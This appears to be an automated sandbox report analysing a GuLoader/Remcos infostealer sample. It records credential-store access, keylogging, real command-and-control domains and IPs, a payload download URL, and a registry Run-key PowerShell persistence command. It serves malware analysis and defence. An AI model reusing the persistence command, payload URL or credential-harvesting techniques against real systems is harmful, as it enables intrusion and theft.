              Source: Yara matchFile source: 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3424, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword12_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword12_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword12_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3424, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6324, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3424, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts112
              Command and Scripting Interpreter
              Logon Script (Windows)212
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              4
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Credentials In Files
              29
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA Secrets131
              Security Software Discovery
              SSH2
              Clipboard Data
              213
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Modify Registry
              Cached Domain Credentials21
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
              Virtualization/Sandbox Evasion
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435147 Sample: Evgh. rvs Armenia. 30.04.2024.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 46 learfo55ozj02.duckdns.org 2->46 48 learfo55ozj01.duckdns.org 2->48 50 2 other IPs or domains 2->50 58 Snort IDS alert for network traffic 2->58 60 Multi AV Scanner detection for domain / URL 2->60 62 Found malware configuration 2->62 66 11 other signatures 2->66 10 Evgh. rvs Armenia. 30.04.2024.exe 4 36 2->10         started        signatures3 64 Uses dynamic DNS services 48->64 process4 file5 42 C:\Users\user\...\Chaptaliseringernes.Kro, ASCII 10->42 dropped 72 Suspicious powershell command line found 10->72 14 powershell.exe 20 10->14         started        signatures6 process7 file8 44 C:\...vgh. rvs Armenia. 30.04.2024.exe, PE32 14->44 dropped 80 Obfuscated command line found 14->80 82 Writes to foreign memory regions 14->82 84 Found suspicious powershell code related to unpacking or dynamic code loading 14->84 86 Powershell drops PE file 14->86 18 wab.exe 5 15 14->18         started        23 conhost.exe 14->23         started        25 cmd.exe 1 14->25         started        signatures9 process10 dnsIp11 52 learfo55ozj01.duckdns.org 192.169.69.26, 29871, 29872, 49713 WOWUS United States 18->52 54 learfo55ozj02.duckdns.org 193.222.96.21, 29872, 49715, 49716 SWISSCOMSwisscomSwitzerlandLtdCH Germany 18->54 56 2 other IPs or domains 18->56 40 C:\Users\user\AppData\Roaming\mqerms.dat, data 18->40 dropped 68 Maps a DLL or memory area into another process 18->68 70 Installs a global keyboard hook 18->70 27 wab.exe 1 18->27         started        30 wab.exe 1 18->30         started        32 wab.exe 14 18->32         started        34 cmd.exe 1 18->34         started        file12 signatures13 process14 signatures15 74 Tries to steal Instant Messenger accounts or passwords 27->74 76 Tries to harvest and steal browser information (history, passwords, etc) 27->76 78 Tries to steal Mail credentials (via file / registry access) 30->78 36 conhost.exe 34->36         started        38 reg.exe 1 1 34->38         started        process16

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Evgh. rvs Armenia. 30.04.2024.exe32%ReversingLabsWin32.Trojan.Guloader
              Evgh. rvs Armenia. 30.04.2024.exe55%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten\Evgh. rvs Armenia. 30.04.2024.exe32%ReversingLabsWin32.Trojan.Guloader
              No Antivirus matches
              SourceDetectionScannerLabelLink
              learfo55ozj02.duckdns.org1%VirustotalBrowse
              covid19support.top9%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://login.li0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp100%URL Reputationphishing
              http://crl.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              http://geoplugin.net/json.gpd0%Avira URL Cloudsafe
              https://covid19support.top/OXdwhUAIa249.bin0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              learfo55ozj01.duckdns.org100%Avira URL Cloudmalware
              http://crl.micro-0%Avira URL Cloudsafe
              https://covid19support.top/$50%Avira URL Cloudsafe
              https://covid19support.top/0%Avira URL Cloudsafe
              https://covid19support.top/OXdwhUAIa249.biny0%Avira URL Cloudsafe
              http://www.imvu.comata0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              learfo55ozj02.duckdns.org
              193.222.96.21
              truetrueunknown
              covid19support.top
              172.67.220.6
              truefalseunknown
              learfo55ozj01.duckdns.org
              192.169.69.26
              truetrue
                unknown
                geoplugin.net
                178.237.33.50
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://covid19support.top/OXdwhUAIa249.binfalse
                  • Avira URL Cloud: safe
                  unknown
                  learfo55ozj01.duckdns.orgtrue
                  • Avira URL Cloud: malware
                  unknown
                  http://geoplugin.net/json.gptrue
                  • URL Reputation: phishing
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpdwab.exe, 00000007.00000002.3256333673.0000000007B04000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2974113888.0000000006049000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.imvu.comrwab.exe, 00000007.00000002.3267844230.0000000023630000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2971208550.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2971208550.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://login.liwab.exe, 0000000B.00000002.3089213333.0000000002AFC000.00000004.00000010.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.2974113888.0000000006049000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.imvu.comwab.exe, wab.exe, 0000000D.00000002.3049192851.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2974113888.0000000006049000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.nirsoft.netwab.exe, 0000000B.00000002.3089240790.0000000002B34000.00000004.00000010.00020000.00000000.sdmpfalse
                          high
                          http://nsis.sf.net/NSIS_ErrorErrorEvgh. rvs Armenia. 30.04.2024.exe, Evgh. rvs Armenia. 30.04.2024.exe.2.drfalse
                            high
                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2971208550.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2977567691.00000000076B0000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000007.00000002.3267844230.0000000023630000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://covid19support.top/$5wab.exe, 00000007.00000002.3256333673.0000000007A9D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.google.comwab.exe, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                high
                                http://crl.micro-powershell.exe, 00000002.00000002.2977567691.0000000007721000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://nsis.sf.net/NSIS_ErrorEvgh. rvs Armenia. 30.04.2024.exe, Evgh. rvs Armenia. 30.04.2024.exe.2.drfalse
                                  high
                                  https://covid19support.top/wab.exe, 00000007.00000002.3256333673.0000000007A78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.micropowershell.exe, 00000002.00000002.2955080970.00000000030C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/powershell.exe, 00000002.00000002.2974113888.0000000006049000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2974113888.0000000006049000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://aka.ms/pscore6lBjqpowershell.exe, 00000002.00000002.2971208550.0000000004FE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/accounts/serviceloginwab.exefalse
                                        high
                                        https://login.yahoo.com/config/loginwab.exefalse
                                          high
                                          https://covid19support.top/OXdwhUAIa249.binywab.exe, 00000007.00000002.3256333673.0000000007A9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.nirsoft.net/wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            high
                                            http://www.imvu.comatawab.exe, 0000000D.00000002.3049192851.0000000002FBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2971208550.0000000004FE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.ebuddy.comwab.exe, wab.exe, 0000000D.00000002.3048930801.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.67.220.6
                                              covid19support.topUnited States
                                              13335CLOUDFLARENETUSfalse
                                              178.237.33.50
                                              geoplugin.netNetherlands
                                              8455ATOM86-ASATOM86NLfalse
                                              192.169.69.26
                                              learfo55ozj01.duckdns.orgUnited States
                                              23033WOWUStrue
                                              193.222.96.21
                                              learfo55ozj02.duckdns.orgGermany
                                              3303SWISSCOMSwisscomSwitzerlandLtdCHtrue
                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1435147
                                              Start date and time:2024-05-02 08:02:08 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 30s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:14
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Evgh. rvs Armenia. 30.04.2024.exe
                                              Detection:MAL
                                              Classification:mal100.phis.troj.spyw.evad.winEXE@19/14@4/4
                                              EGA Information:
                                              • Successful, ratio: 83.3%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 219
                                              • Number of non-executed functions: 218
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 7160 because it is empty
                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              TimeTypeDescription
                                              08:02:58API Interceptor29x Sleep call for process: powershell.exe modified
                                              08:04:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)
                                              08:04:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Ufuldbaarnes% -windowstyle minimized $Nonconjecturably=(Get-ItemProperty -Path 'HKCU:\Nausea\').Wryer;%Ufuldbaarnes% ($Nonconjecturably)
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              172.67.220.6z39103_PN-EN-1090-1_A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                178.237.33.50202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                • geoplugin.net/json.gp
                                                nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                • geoplugin.net/json.gp
                                                New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                PO-TKT-RFQ#24_4_30.com.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                AWBSHIPPING-DHL-46T6R9764987.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                • geoplugin.net/json.gp
                                                192.169.69.26&nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                                                • servidorarquivos.duckdns.org/e/e
                                                transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                                                • servidorarquivos.duckdns.org/e/e
                                                http://www.secure-0fflce-o365.duckdns.org/Get hashmaliciousUnknownBrowse
                                                • www.secure-0fflce-o365.duckdns.org/
                                                http://muqzwpkojc.duckdns.orgGet hashmaliciousUnknownBrowse
                                                • muqzwpkojc.duckdns.org/
                                                http://jrljsybkku.duckdns.orgGet hashmaliciousUnknownBrowse
                                                • jrljsybkku.duckdns.org/
                                                last.exeGet hashmaliciousRedLineBrowse
                                                • siyatermi.duckdns.org:17044/
                                                5BDF181C629182A48CE6810CD0987FB0C1242DED4C9E7.exeGet hashmaliciousRedLineBrowse
                                                • redline957.duckdns.org:35253/IRemotePanel
                                                1ZXSAOPKH09SA_PAYMENT-COPY.jsGet hashmaliciousVjW0rmBrowse
                                                • jamnnd.duckdns.org:8024/Vre
                                                LB9lJxaVP7.exeGet hashmaliciousUnknownBrowse
                                                • cpanelcustomershost.duckdns.org/SystemEnv/uploads/newsoftware-tester_Gurledjm.jpg
                                                Scan0049938_pdf.com.exeGet hashmaliciousUnknownBrowse
                                                • cpanelcustomershost.duckdns.org/SystemEnv/uploads/newsoftware-tester_Wrpqkawe.bmp
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                learfo55ozj01.duckdns.orgdocumento.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 192.169.69.26
                                                .04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                z39103_PN-EN-1090-1_A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                z6FORMATOPROVEEDORESMETAX.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                z77EU17439-FT-MILKYLUXGOUDAMILD.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                sample.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                Copy of Noyan Order Form Global Importing Group 2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                covid19support.topz39103_PN-EN-1090-1_A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 172.67.220.6
                                                geoplugin.net202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                PO-TKT-RFQ#24_4_30.com.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                AWBSHIPPING-DHL-46T6R9764987.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                SWISSCOMSwisscomSwitzerlandLtdCHcvoBQP1Lxo.elfGet hashmaliciousMiraiBrowse
                                                • 170.17.254.60
                                                cqf3hb5Qxg.elfGet hashmaliciousMiraiBrowse
                                                • 146.4.138.28
                                                957URl9ErB.exeGet hashmaliciousSocks5SystemzBrowse
                                                • 193.222.96.219
                                                .04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                z39103_PN-EN-1090-1_A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                z6FORMATOPROVEEDORESMETAX.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                z77EU17439-FT-MILKYLUXGOUDAMILD.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                sample.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                • 164.204.161.205
                                                Copy of Noyan Order Form Global Importing Group 2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 193.222.96.21
                                                WOWUSPLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                • 192.169.69.26
                                                documento.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                • 192.169.69.26
                                                LUMEN3547583853959599359959359Cercospora.batGet hashmaliciousGuLoader, RemcosBrowse
                                                • 192.169.69.26
                                                https://pub-68c8c7ae0a9b4e62b5641da4fe04590d.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 192.169.69.26
                                                https://svuch3d.duckdns.org/Get hashmaliciousUnknownBrowse
                                                • 192.169.69.26
                                                https://6mw23o.duckdns.org/Get hashmaliciousUnknownBrowse
                                                • 192.169.69.26
                                                https://ixkv5pf.duckdns.org/Get hashmaliciousUnknownBrowse
                                                • 192.169.69.26
                                                87tBuE42ft.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 172.93.222.219
                                                VbVGKkKgdbEScfW.scrGet hashmaliciousNanocore, PureLog StealerBrowse
                                                • 192.169.69.26
                                                dxM4ij1KkuoBK3H.scrGet hashmaliciousNanocoreBrowse
                                                • 192.169.69.26
                                                CLOUDFLARENETUSDATASHEET rfq.exeGet hashmaliciousGuLoaderBrowse
                                                • 162.159.133.233
                                                DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                • 104.21.27.85
                                                PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                • 104.21.27.85
                                                EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                • 104.21.25.202
                                                SecuriteInfo.com.Win32.PWSX-gen.8803.13656.exeGet hashmaliciousRisePro StealerBrowse
                                                • 104.26.5.15
                                                Fizet#U00e9s,pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 104.26.13.205
                                                G1lnGpOLK4.exeGet hashmaliciousNjratBrowse
                                                • 104.20.3.235
                                                https://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0Get hashmaliciousHTMLPhisherBrowse
                                                • 104.17.2.184
                                                http://www.multipli.com.auGet hashmaliciousUnknownBrowse
                                                • 104.26.9.44
                                                https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.comGet hashmaliciousUnknownBrowse
                                                • 104.16.117.116
                                                ATOM86-ASATOM86NL202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                bYPQHxUNMF.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                doc.batGet hashmaliciousGuLoader, RemcosBrowse
                                                • 178.237.33.50
                                                New Order.xla.xlsxGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                PO-TKT-RFQ#24_4_30.com.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                37f463bf4616ecd445d4a1937da06e19DATASHEET rfq.exeGet hashmaliciousGuLoaderBrowse
                                                • 172.67.220.6
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 172.67.220.6
                                                SOLICITUD DE PRESUPUESTO.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                • 172.67.220.6
